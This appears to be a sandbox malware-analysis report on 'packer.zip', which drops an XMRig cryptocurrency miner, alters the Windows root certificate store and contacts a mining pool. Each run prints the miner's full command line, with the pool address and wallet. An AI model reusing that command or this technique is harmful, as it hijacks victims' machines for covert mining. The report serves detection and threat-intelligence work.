Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 18:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1795s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2036 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2036 wrote to memory of 2376 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2376-16-0x000001E73C8F0000-0x000001E73C910000-memory.dmp
memory/2376-17-0x000001E7D0660000-0x000001E7D0680000-memory.dmp
memory/2376-18-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-19-0x000001E7D0CB0000-0x000001E7D0CD0000-memory.dmp
memory/2376-20-0x000001E7D0CD0000-0x000001E7D0CF0000-memory.dmp
memory/2376-21-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-22-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-25-0x000001E7D0CD0000-0x000001E7D0CF0000-memory.dmp
memory/2376-24-0x000001E7D0CB0000-0x000001E7D0CD0000-memory.dmp
memory/2376-23-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-26-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-27-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-28-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-29-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-30-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-31-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-32-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-33-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-34-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-35-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-36-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-37-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-38-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-39-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-40-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-41-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-42-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-43-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-44-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-45-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-46-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-47-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-48-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-49-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-50-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-51-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-52-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-53-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-54-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-55-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-56-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-57-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-58-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-59-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-60-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-61-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-62-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-63-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-64-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-65-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-66-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-67-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-68-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-69-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-70-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-71-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-72-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-73-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-74-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-75-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-76-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-77-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-78-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-79-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-80-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-81-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-82-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-83-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
memory/2376-84-0x00007FF7F5D60000-0x00007FF7F6863000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1912 wrote to memory of 5016 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1912 wrote to memory of 5016 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/5016-16-0x0000022243DF0000-0x0000022243E10000-memory.dmp
memory/5016-17-0x0000022243E40000-0x0000022243E60000-memory.dmp
memory/5016-18-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-19-0x0000022245740000-0x0000022245760000-memory.dmp
memory/5016-20-0x0000022245720000-0x0000022245740000-memory.dmp
memory/5016-21-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-22-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-25-0x0000022245720000-0x0000022245740000-memory.dmp
memory/5016-24-0x0000022245740000-0x0000022245760000-memory.dmp
memory/5016-23-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-26-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-27-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-28-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-29-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-30-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-31-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-32-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-33-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-34-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-35-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-36-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-37-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-38-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-39-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-40-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-41-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-42-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-43-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-44-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-45-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-46-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-47-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-48-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-49-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-50-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-51-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-52-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-53-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-54-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-55-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-56-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-57-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-58-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-59-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-60-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-61-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-62-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-63-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-64-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-65-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-66-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-67-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-68-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-69-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-70-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-71-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-72-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-73-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-74-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-75-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-76-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-77-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-78-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-79-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-80-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-81-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-82-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-83-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
memory/5016-84-0x00007FF7031C0000-0x00007FF703CC3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (blob data elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1576 wrote to memory of 3840 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1576 wrote to memory of 3840 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3840-16-0x000001AC082A0000-0x000001AC082C0000-memory.dmp
memory/3840-17-0x000001AC09CE0000-0x000001AC09D00000-memory.dmp
memory/3840-18-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-19-0x000001AC09D00000-0x000001AC09D20000-memory.dmp
memory/3840-20-0x000001AC09D20000-0x000001AC09D40000-memory.dmp
memory/3840-21-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-22-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-23-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-24-0x000001AC09D00000-0x000001AC09D20000-memory.dmp
memory/3840-25-0x000001AC09D20000-0x000001AC09D40000-memory.dmp
memory/3840-26-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-27-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-28-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-29-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-30-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-31-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-32-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-33-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-34-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-35-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-36-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-37-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-38-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-39-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-40-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-41-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-42-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-43-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-44-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-45-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-46-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-47-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-48-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-49-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-50-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-51-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-52-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-53-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
memory/3840-54-0x00007FF62B6B0000-0x00007FF62C1B3000-memory.dmp
